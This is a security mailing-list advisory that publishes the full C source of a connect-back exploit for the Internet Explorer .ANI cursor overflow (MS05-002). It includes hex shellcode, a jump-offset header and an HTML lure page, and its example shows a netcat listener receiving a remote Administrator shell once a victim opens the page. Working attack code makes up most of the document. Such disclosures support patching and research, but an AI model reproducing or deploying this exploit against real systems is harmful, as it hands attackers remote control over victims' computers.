[EXPL] Microsoft Internet Explorer .ANI Files Handling ConnectBack Exploit (MS05-002)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Microsoft Internet Explorer .ANI Files Handling ConnectBack Exploit 
(MS05-002)
------------------------------------------------------------------------


SUMMARY

In January's monthly security updates, Microsoft released a patch that fix 
a vulnerability in the handling of .ANI file format. More information can 
be found at:  <http://www.securiteam.com/windowsntfocus/5YP0F0KEKK.html> 
Windows ANI File Parsing Buffer Overflow (MS05-002). Below you can find a 
universal exploit code for this vulnerability with a connectback 
shellcode.

DETAILS

Exploit:
/* WC-ms05002-ani-expl-cb.c: 2005-01-30: PUBLIC v.0.2
 *
 * Copyright (c) 2004-2005 WhiskyCoders.
 *
 * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
 * (CAN-2004-1049)
 *
 * WhiskyCoders - http://bennupg.ath.cx
 * Greetz: nitrous, kubaner, cryogen, rowter, dex, beck, and everyone else 
in the vulnfact.com crew
 *
 * (universal -- for all affected systems)
 * ---------------------------------------------------------------------
 * Notes:
 *    This is a mod of houseofdabus (HOD-ms05002-ani-expl.c) exploit.
 *    http://www.k-otik.com/exploits/20050123.HOD-ms05002-ani-expl.c.php
 * ---------------------------------------------------------------------
 * Description:
 *    A remote code execution vulnerability exists in the way that
 *    cursor, animated cursor, and icon formats are handled. An attacker
 *    could try to exploit the vulnerability by constructing a malicious
 *    cursor or icon file that could potentially allow remote code
 *    execution if a user visited a malicious Web site or viewed a
 *    malicious e-mail message. An attacker who successfully exploited
 *    this vulnerability could take complete control of an affected
 *    system.
 *
 * ---------------------------------------------------------------------
 * Patch:
 *    http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
 *
 * ---------------------------------------------------------------------
 * Tested on:
 *    - Windows Server 2003
 *    - Windows XP SP1
 *    - Windows XP SP0
 *    - Windows 2000 SP4
 *    - Windows 2000 SP3
 *    - Windows 2000 SP2
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++  : cl -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
 * Win32/cygwin: gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
 * Linux       : gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 **ATTACKER:
 *
 * d00d@whiskybox $ WC-ms05002-ani-expl-cb poc 7778 192.168.0.30
 * <...>
 * [*] Creating poc.ani file ... Ok
 * [*] Creating poc.html file ... Ok
 *
 * d00d@whiskybox $ netcat -l -p 7778 -v
 *
 **VICTIM:
 *
 * C:\> iexplore C:\poc.html
 *
 **ATTACKER:
 * d00d@whiskybox $ netcat -l -p 7778 -v
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\Documents and Settings\Administrator\Desktop>
 *
 * ---------------------------------------------------------------------
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 *
 */
 
#include <stdio.h>
#include <stdlib.h>
 
 
/* ANI header */
unsigned char aniheader[] =
"\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 
/* jmp offset, no Jitsu */
"\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
"\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
"\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
"\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
"\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
"\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
"\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 
 
/* connectback shellcode */
unsigned char shellcode[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
"\x77\x38\xff\x55\x20\xff\x55\x0c";

#define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+283)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290)) = 
(port)

unsigned char discl[] =
"This is provided as proof-of-concept code only for educational"
" purposes and testing by authorized individuals with permission"
" to do so.";
 
unsigned char html[] =
"<html>\n"
"(MS05-002) Microsoft Internet Explorer .ANI Files Handling
Exploit"
"<br>Copyright (c) 2004-2005 :: WhiskyCoders :: <br><a href
-\""
"http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx\";>"
"Patch (MS05-002)</a>\n"
"<script>alert(\"%s\")</script>\n<head>\n\t<style>\n"
"\t\t* {CURSOR: url(\"%s.ani\")}\n\t</style>\n</head>\n"
"</html>";
 
 
unsigned short
fixx(unsigned short p)
{
unsigned short r = 0;
r  = (p & 0xFF00) >> 8;
r |= (p & 0x00FF) << 8;
 
return r;
}
 
void
usage(char *prog)
{
printf("Usage:\n");
printf("%s <file> <port> <ip>\n\n", prog);
exit(0);
}
 
 
int
main(int argc, char **argv)
{
FILE *fp;
unsigned short port;
unsigned long backip = 0;
unsigned char f[256+5] = "";
unsigned char anib[912] = "";
 
 
printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling 
Exploit\n\n");
printf("\tCopyright (c) 2004-2005 :: WhiskyCoders :: \n\n\n");
printf("Tested on all affected systems:\n");
printf("   [+] Windows Server 2003\n   [+] Windows XP SP1, SP0\n");
printf("   [+] Windows 2000 All SP\n\n");
 
printf("%s\n\n", discl);
if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
printf("[-] Size of shellcode must be <= 686 bytes\n");
return 0;
}
if (argc < 3) usage(argv[0]);
 
if (strlen(argv[1]) > 256) {
printf("[-] Size of filename must be <=256 bytes\n");
return 0;
}
 
/* creating ani file */
strcpy(f, argv[1]);
strcat(f, ".ani");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can\'t create file: %s\n", f);
return 0;
}
memset(anib, 0x90, 912);
 
/* header */
memcpy(anib, aniheader, sizeof(aniheader)-1);

/* shellcode */
port = atoi(argv[2]);
SET_CONNECTBACK_PORT(shellcode, fixx(port));

backip = inet_addr(argv[3]);
SET_CONNECTBACK_IP(shellcode, backip);

memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1);
 
fwrite(anib, 1, 912, fp);
printf(" Ok\n");
fclose(fp);
 
/* creating html file */
f[0] = '\0';
strcpy(f, argv[1]);
strcat(f, ".html");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can\'t create file: %s\n", f);
return 0;
}
sprintf(anib, html, discl, argv[1]);
fwrite(anib, 1, strlen(anib), fp);
printf(" Ok\n");
fclose(fp);
 
return 0;
}
 


ADDITIONAL INFORMATION

The information has been provided by  <mailto:benoror@gmail.com> Benn 
Goldman Rivers.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.